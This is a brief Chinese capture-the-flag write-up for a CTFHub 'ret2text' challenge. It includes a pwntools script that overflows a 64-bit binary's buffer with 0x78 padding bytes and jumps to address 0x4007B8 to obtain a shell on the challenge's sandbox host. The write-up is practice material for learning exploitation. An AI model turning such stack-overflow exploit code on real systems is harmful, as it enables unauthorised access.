64位的程序,没有发现保护
将溢出地址设置为 图中的位置 可以获取Shell
from pwn import *
import re
context(os='linux', arch="amd64", log_level="debug")
content = 0
def main():
if content == 1:
peiqi = process("pwn")
else:
peiqi = remote("challenge-619914dcf99e6685.sandbox.ctfhub.com",29602)
payload = b"a" * (0x70 + 8)
payload = payload + p64(0x4007B8)
peiqi.recvuntil("Welcome to CTFHub ret2text.Input someting:\n")
peiqi.sendline(payload)
peiqi.interactive()
main()